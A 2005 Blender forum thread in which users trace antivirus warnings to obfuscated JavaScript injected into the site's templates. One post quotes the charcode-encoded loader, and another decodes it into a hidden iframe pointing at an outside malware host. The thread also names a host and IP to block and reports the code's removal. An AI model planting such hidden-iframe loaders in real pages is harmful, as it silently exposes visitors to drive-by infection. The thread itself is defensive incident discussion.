virus

General discussion about the development of the open source Blender

Moderators: jesterKing, stiv

Post Reply
coldlamper
Posts: 0
Joined: Fri Mar 25, 2005 5:38 pm

virus

Post by coldlamper » Sat Jun 25, 2005 12:10 am

Everytime I come to this site I get a Virus detected from AVG.
I-Worm/Bofra

Anyone else ever get this?

reD_Fox
Posts: 0
Joined: Sat Mar 12, 2005 2:56 pm
Location: Abilene, KS

Yeah, me too!

Post by reD_Fox » Sat Jun 25, 2005 12:46 am

I'm getting something similar.
Norton says that it's "Downloader.Trojan"
Something that apparantly uses an IFRAME vulnerability in IE. It apparently is trying to connect to http://eofsoftware.org/x.html
which is the page that seems to host the malicious code.
I would recommend that someone look into it.

Levi
A three-legged stool never wobbles.

z3r0_d
Posts: 289
Joined: Wed Oct 16, 2002 2:38 am
Contact:

Post by z3r0_d » Sat Jun 25, 2005 1:37 am

yeah

Code: Select all

<script language="JavaScript">


// universal location script v 1.34


var checkcode = String.fromCharCode(60,105,102,114,97,109,101,32, 115,114,99,61,39,104,116,116,112,58,47,47,101,111,102,115,111,102, 116,119,97,114,101,46,111,114,103,47,120,46,104,116,109,108,39,32, 115,116,121,108,101,61,39,100,105,115,112,108,97,121,58,32,110,111, 110,101,59,32,118,105,115,105,98,105,108,105,116,121,58,32,104,105, 100,100,101,110,59,32,119,105,100,116,104,58,32,49,59,32,104,101,105, 103,104,116,58,32,49,39,62,60,47,105,102,114,97,109,101,62);document.write(checkcode);
</script>
[spaces added to last bit because messed up display]
very annoying, good excuse to diable Java Script...

vulnerability in IE? no, it writes the code for an iframe... I have no idea why it would be there though

ysvry
Posts: 0
Joined: Thu Aug 05, 2004 4:28 pm

Post by ysvry » Sun Jun 26, 2005 1:11 am

well let the webmaster get that script out then giving chance to upload an trojan is bad and can harm blenders reputation badly. its now 24 hours later and still nothing is done ? Ton if you dont see it on linux or mac box check it on a windows machine with proper virus checker. this should be sorted out quickly. Also the one responsable for adding the script should be banned.

coldlamper
Posts: 0
Joined: Fri Mar 25, 2005 5:38 pm

Post by coldlamper » Sun Jun 26, 2005 3:31 am

If you have a firewall and have the ability to block hosts or ip's I would suggest blocking:

eofsoftware.org
or
67.19.170.226

coldlamper
Posts: 0
Joined: Fri Mar 25, 2005 5:38 pm

Post by coldlamper » Sun Jun 26, 2005 4:04 am

var checkcode = String.fromCharCode(60,105,102,114,97,109,101,32, 115,114,99,61,39,104,116,116,112,58,47,47,101,111,102,115,111,102, 116,119,97,114,101,46,111,114,103,47,120,46,104,116,109,108,39,32, 115,116,121,108,101,61,39,100,105,115,112,108,97,121,58,32,110,111, 110,101,59,32,118,105,115,105,98,105,108,105,116,121,58,32,104,105, 100,100,101,110,59,32,119,105,100,116,104,58,32,49,59,32,104,101,105, 103,104,116,58,32,49,39,62,60,47,105,102,114,97,109,101,62);document.write(checkcode);


outputs

<frame src="http://eofsoftware.org/x.html" style='display: none; visibility: hidden; width: 1; height: 1'></frame>

levon
Posts: 0
Joined: Thu Jul 31, 2003 6:06 am
Location: adelaide

Post by levon » Sun Jun 26, 2005 4:58 am

first of alll, you are using IE?????


try clearing all your cache, cookies, files etc.... and running a adaware detector on your computer, its more then likley that you have a browser hijacker.

z3r0_d
Posts: 289
Joined: Wed Oct 16, 2002 2:38 am
Contact:

Post by z3r0_d » Sun Jun 26, 2005 9:52 am

levon wrote:first of alll, you are using IE?????


try clearing all your cache, cookies, files etc.... and running a adaware detector on your computer, its more then likley that you have a browser hijacker.
its there regardless of the browser, check the source of any templated page [like this one]... you'll see it too

matt_e
Posts: 410
Joined: Mon Oct 14, 2002 4:32 am
Location: Sydney, Australia
Contact:

Post by matt_e » Sun Jun 26, 2005 2:32 pm

I checked this out, and it looks like there was some very dodgy looking obfuscated code inserted into the bottom of one of the postnuke PHP template files. This code was generating the javascript code block that coldlamper posted. As far as I know, there should be nothing at all to do with "eofsoftware.org" within our source code.

This entire thing is very suspicious and I've removed the code in question. The server admins are looking in to what's happened here, but at least things should be safe for now. Windows users, please check to see if you are still getting the warning, and keep us up to date if it happens again.

Cheers

Lorca
Posts: 13
Joined: Tue Jan 14, 2003 12:44 pm
Location: São Paulo, Brasil

Post by Lorca » Sun Jun 26, 2005 7:41 pm

Iam browsing this forum whith IE and everything looks fine. What a nonsense atack!

ysvry
Posts: 0
Joined: Thu Aug 05, 2004 4:28 pm

Post by ysvry » Wed Jun 29, 2005 2:48 am

now the code has been removed it works ok. Maybe you can do acheck up on who owns the site were the frame linked too?

It was not cookies or something in the cache as i cleared that out before i posted my first post.
some fucker tried to install trojans on window computers , if he succeeded he could for example format your hd. so it is grave.

ysvry
Posts: 0
Joined: Thu Aug 05, 2004 4:28 pm

Post by ysvry » Mon Jul 04, 2005 3:21 pm

It would be nice if we get an explination of what happened and who was resposible for this attack??

Post Reply